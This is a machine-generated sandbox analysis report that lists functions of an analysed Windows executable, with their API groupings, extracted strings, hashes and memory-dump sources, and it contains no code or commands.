                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                • String ID:
                                                                                • API String ID: 1239891234-0
                                                                                • Opcode ID: a012b73838b214995184a74d390d22d5d4f2798e6d2ee27280782cebe5dad480
                                                                                • Instruction ID: 9f53411561b32ec5af76b0f0a8f965070f59b088e3ce4e05a4bf2626df3f8a41
                                                                                • Opcode Fuzzy Hash: a012b73838b214995184a74d390d22d5d4f2798e6d2ee27280782cebe5dad480
                                                                                • Instruction Fuzzy Hash: 86316F36A08BC186DB709F75E8406EEB3A4FB887A8F900135EA9D47B58DF38D5558B10
                                                                                Function 00007FF79F8DD2C4 Relevance: 9.1, APIs: 6, Instructions: 77processCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                • String ID:
                                                                                • API String ID: 1413079979-0
                                                                                • Opcode ID: e80dfedd3eaf6b84f7bd14bc2d1553c684f5a5893d6eff82682e3bb03b713a55
                                                                                • Instruction ID: d96d7302c779c3c027c6f2e2c923319ccd46f957ecab195865c9af214e0672d8
                                                                                • Opcode Fuzzy Hash: e80dfedd3eaf6b84f7bd14bc2d1553c684f5a5893d6eff82682e3bb03b713a55
                                                                                • Instruction Fuzzy Hash: 53317A32608BC586D7B49F12E880BAAB3A4FB88BA0F454126DE8D43B18DF3CD455CB10
                                                                                Function 00007FF79F8DD868 Relevance: 9.0, APIs: 6, Instructions: 22memorysynchronizationCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                • String ID:
                                                                                • API String ID: 146765662-0
                                                                                • Opcode ID: d3946954f153790a4c7b3048297fa9f332d93d6b437e3fe9da6548dd2ef4d2ab
                                                                                • Instruction ID: 1cc064c0a4d46e3740ae8ed12ee81ffde12f44014a8ca204891550729ff3bc8d
                                                                                • Opcode Fuzzy Hash: d3946954f153790a4c7b3048297fa9f332d93d6b437e3fe9da6548dd2ef4d2ab
                                                                                • Instruction Fuzzy Hash: 41F0AC25A15A8182EB14FF76EC540A9A361EF88FB5B459131CD1E8A3A8CF3CD4958310
                                                                                Function 00007FF79F8FA874 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 118filesleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState
                                                                                • String ID: *.*
                                                                                • API String ID: 1927845040-438819550
                                                                                • Opcode ID: 6a88b2503df8e5f85dd4c462440c0fc5a039f53792e222b5ac7c7da246e49fe0
                                                                                • Instruction ID: 87c893050ea6cefbfa9686622161e4c6c05defe055adae7b1f3dab626e202840
                                                                                • Opcode Fuzzy Hash: 6a88b2503df8e5f85dd4c462440c0fc5a039f53792e222b5ac7c7da246e49fe0
                                                                                • Instruction Fuzzy Hash: 7E51E222608AC298EB60EB34E8456EDA3B0FB547B4F900032DE5D43799DF3CE559D760
                                                                                Function 00007FF79F87BE70 Relevance: 8.6, Strings: 6, Instructions: 1141COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: ERCP$PCRE$VUUU$VUUU$VUUU$VUUU
                                                                                • API String ID: 0-2187161917
                                                                                • Opcode ID: 52bbb01250ada343afc02eebb5c988e0963da5400e9343603d667423943af628
                                                                                • Instruction ID: febfbd4bd5da16684abdd58228fd3a63eeba65e482919b080c15c091741a92ea
                                                                                • Opcode Fuzzy Hash: 52bbb01250ada343afc02eebb5c988e0963da5400e9343603d667423943af628
                                                                                • Instruction Fuzzy Hash: F8B2E372E186D286EBB49F759404AFCB7A1FB45788F904035DE4D57B84DF38E8A0A720
                                                                                Function 00007FF79F904074 Relevance: 7.6, APIs: 5, Instructions: 148networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLastinet_addrsocket
                                                                                • String ID:
                                                                                • API String ID: 4170576061-0
                                                                                • Opcode ID: ea9322bb4ddc6559c8a09ac09f5cb3baf94142c17e0f244aa1b03abeb354fc5a
                                                                                • Instruction ID: 6e9039e2756efb1608ffb35b229c3fc76e9f5341dbabe92b0463cdd5948d4d8c
                                                                                • Opcode Fuzzy Hash: ea9322bb4ddc6559c8a09ac09f5cb3baf94142c17e0f244aa1b03abeb354fc5a
                                                                                • Instruction Fuzzy Hash: 5F51D322B086D281DB60FB379404AFDABA0BB89FE4F948531DE5D4B796CE3CD1509790
                                                                                Function 00007FF79F8F5F2C Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 300comCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: CreateFullInitializeInstanceNamePathUninitialize
                                                                                • String ID: .lnk
                                                                                • API String ID: 3769357847-24824748
                                                                                • Opcode ID: e9a41c1307533edd4d22b0f8b30ca28bda216ecff893dec0b295dcafc10e7183
                                                                                • Instruction ID: 5484a12962edd9a54de10fb036191f0c3672c726f89b0343808008a2b2a0780e
                                                                                • Opcode Fuzzy Hash: e9a41c1307533edd4d22b0f8b30ca28bda216ecff893dec0b295dcafc10e7183
                                                                                • Instruction Fuzzy Hash: AED19D76B04A8689EB60EF36C081AEC77B0FB98B88B944132CE0D57B59DF39D455D360
                                                                                Function 00007FF79F8A793C Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 262COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: _handle_error
                                                                                • String ID: !$VUUU$fmod
                                                                                • API String ID: 1757819995-2579133210
                                                                                • Opcode ID: 891804033c6d9bcc01b81d75b861d81fbb0e9180f173dbd42278a229c0b4683c
                                                                                • Instruction ID: 99beb781f672d69de4dcfaa2fa82198f1da9ec50c94bef2fafdff52997e76e9d
                                                                                • Opcode Fuzzy Hash: 891804033c6d9bcc01b81d75b861d81fbb0e9180f173dbd42278a229c0b4683c
                                                                                • Instruction Fuzzy Hash: 3AB10821A1DFC545D6F39A3450113FAF259EFAA390F50C332E96E35AA4EF2CE5929700
                                                                                Function 00007FF79F8B2D20 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 169COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _invalid_parameter_noinfo.LIBCMT ref: 00007FF79F8B2D60
                                                                                  • Part of subcall function 00007FF79F8AB184: GetCurrentProcess.KERNEL32(00007FF79F8AB21D), ref: 00007FF79F8AB1B1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentProcess_invalid_parameter_noinfo
                                                                                • String ID: *$.$.
                                                                                • API String ID: 2518042432-2112782162
                                                                                • Opcode ID: 10686662bc6c287608bb1927b489f0d8a7225314f89d29ff6f04aab4d96db585
                                                                                • Instruction ID: 4246b969998e7217e19e8dc07396b038b7eb1b915fdea9886f0b43b049de270d
                                                                                • Opcode Fuzzy Hash: 10686662bc6c287608bb1927b489f0d8a7225314f89d29ff6f04aab4d96db585
                                                                                • Instruction Fuzzy Hash: 6251F122F11A9584FB61EBB6A8009FDA7A4FF44BC9F944535CE0D17B89DE38D0629320
                                                                                Function 00007FF79F8EC110 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: CloseControlCreateDeviceFileHandle
                                                                                • String ID: 0
                                                                                • API String ID: 33631002-4108050209
                                                                                • Opcode ID: 122fac756a3aebd614dbe24bd4d9d3fcd08661cb9d9b68eb4b308195107418d6
                                                                                • Instruction ID: 6b12dbae48e8a9aee013ceaa16bd651491134674f1a568b22905f2d3fcda6a37
                                                                                • Opcode Fuzzy Hash: 122fac756a3aebd614dbe24bd4d9d3fcd08661cb9d9b68eb4b308195107418d6
                                                                                • Instruction Fuzzy Hash: 7D2162326187C0C6D3709F21E884A9AB7A4F7857A4F544229DB9D43B98DF3CD555CB00
                                                                                Function 00007FF79F8ED750 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50shutdownCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: System$AdjustErrorExitInitiateLastLookupPowerPrivilegePrivilegesShutdownStateTokenValueWindows
                                                                                • String ID: SeShutdownPrivilege
                                                                                • API String ID: 2163645468-3733053543
                                                                                • Opcode ID: d91431930fad3db0e3d1089491ea6c9a4476952d79cc7edd8ba2b1494bd95168
                                                                                • Instruction ID: cb0a970a377820862435e56fffc9c356b4ab51940470578c24a3b47217401721
                                                                                • Opcode Fuzzy Hash: d91431930fad3db0e3d1089491ea6c9a4476952d79cc7edd8ba2b1494bd95168
                                                                                • Instruction Fuzzy Hash: 5611B233B1868282E770BB359C406AEE251AFC4760F854136E54D87999DF3CD8299750
                                                                                Function 00007FF79F895BC0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00007FF79F895C43
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: DebugDebuggerErrorLastOutputPresentString
                                                                                • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                • API String ID: 389471666-631824599
                                                                                • Opcode ID: a6f712f19902253ba7949c04243615cc0ab49cc8bc5c14b6f720c4296af9f677
                                                                                • Instruction ID: 034f69c4464276c948fd6e4a1d635c88e414d8a39f363c037771d9bcc679a60e
                                                                                • Opcode Fuzzy Hash: a6f712f19902253ba7949c04243615cc0ab49cc8bc5c14b6f720c4296af9f677
                                                                                • Instruction Fuzzy Hash: DC113A32A18B82A6EB64AB36DA547F9B3A4FB44355F804135C64D86A54EF3CF0B4D720
                                                                                Function 00007FF79F907634 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: GetModuleHandleExW$kernel32.dll
                                                                                • API String ID: 2574300362-199464113
                                                                                • Opcode ID: 9d631b409b72dc16789edb0ad8e091fb1f9f1d2362d8f0f21b849f1d793f88a0
                                                                                • Instruction ID: 43be5e0c8a7131392305ea7febdac144b19c7982eaea8dbfe7bb47d827ea58ca
                                                                                • Opcode Fuzzy Hash: 9d631b409b72dc16789edb0ad8e091fb1f9f1d2362d8f0f21b849f1d793f88a0
                                                                                • Instruction Fuzzy Hash: 97E0ED25E15B4681EF24AB35E8543F863E0FB18B68FC80435D91D85358EF7CD598C351
                                                                                Function 00007FF79F882E30 Relevance: 6.5, APIs: 2, Strings: 1, Instructions: 1264COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Init_thread_footer
                                                                                • String ID: Variable must be of type 'Object'.
                                                                                • API String ID: 1385522511-109567571
                                                                                • Opcode ID: 09b0c8642434f20ce4b814200726c115a0bcc0e38a9d6de865f3abdb52dfbc80
                                                                                • Instruction ID: bcb6ebc8e85766062ae52767812798c15ddd887e98bac5ed1edc26c73a8ec513
                                                                                • Opcode Fuzzy Hash: 09b0c8642434f20ce4b814200726c115a0bcc0e38a9d6de865f3abdb52dfbc80
                                                                                • Instruction Fuzzy Hash: 2AC2A532A08AC286EBB0EF25D440AF9B361FB44B94F945132DA5D57795CF3DE4A1E320
                                                                                Function 00007FF79F8EBE00 Relevance: 6.1, APIs: 4, Instructions: 101processCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                • String ID:
                                                                                • API String ID: 1083639309-0
                                                                                • Opcode ID: 02ce357f99ea2512f20365e7a5c976855fb5bc5f8675b646551cc21f1f11311e
                                                                                • Instruction ID: 3b5d65d370d8db9486fd587bc831a9519146fbae864ca76ee9757c9f62a2ed89
                                                                                • Opcode Fuzzy Hash: 02ce357f99ea2512f20365e7a5c976855fb5bc5f8675b646551cc21f1f11311e
                                                                                • Instruction Fuzzy Hash: EE41B122A18AC291EB60FB71E480AEEA364FB84B94FC44032EE8D03755DF7CE555D710
                                                                                Function 00007FF79F883C20 Relevance: 5.3, APIs: 3, Instructions: 832COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: Init_thread_footer
                                                                                • String ID:
                                                                                • API String ID: 1385522511-0
                                                                                • Opcode ID: 60f9666ca451ed35fe8ab7f9d9e10171ddfa37ac04d0aa9f8a10e9c9a443c8f8
                                                                                • Instruction ID: 3d6990e3743383787ee33996a1fc7c632ce65c0850bcae67de342b302b977199
                                                                                • Opcode Fuzzy Hash: 60f9666ca451ed35fe8ab7f9d9e10171ddfa37ac04d0aa9f8a10e9c9a443c8f8
                                                                                • Instruction Fuzzy Hash: 2B827232A09AC285EBB0EF25D444AF9B3A4FB44B94F914036DA5D47798DF3DE461E320
                                                                                Function 00007FF79F890E90 Relevance: 4.9, Strings: 3, Instructions: 1176COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $[$\
                                                                                • API String ID: 0-3681541464
                                                                                • Opcode ID: f7681cbd2ea07fa149fa3418819e144fbe1fe0a990a0ed3c69471eaae0dbb131
                                                                                • Instruction ID: 7eb569a9fedcd6bb55be6293b893b8574758b63860e85c5879f77668ef8ea4d9
                                                                                • Opcode Fuzzy Hash: f7681cbd2ea07fa149fa3418819e144fbe1fe0a990a0ed3c69471eaae0dbb131
                                                                                • Instruction Fuzzy Hash: BDB2AC72B187968AEBB49F75C440AECB7B1FB04748F904136CA0D97B88EB39E950D750
                                                                                Function 00007FF79F8A1750 Relevance: 4.8, APIs: 3, Instructions: 340COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.1916216550.00007FF79F871000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF79F870000, based on PE: true
                                                                                • Associated: 0000000A.00000002.1916107238.00007FF79F870000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F925000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916755470.00007FF79F95A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                • Associated: 0000000A.00000002.1916866414.00007FF79F964000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_7ff79f870000_PefjSkkhb.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy_s
                                                                                • String ID:
                                                                                • API String ID: 1502251526-0
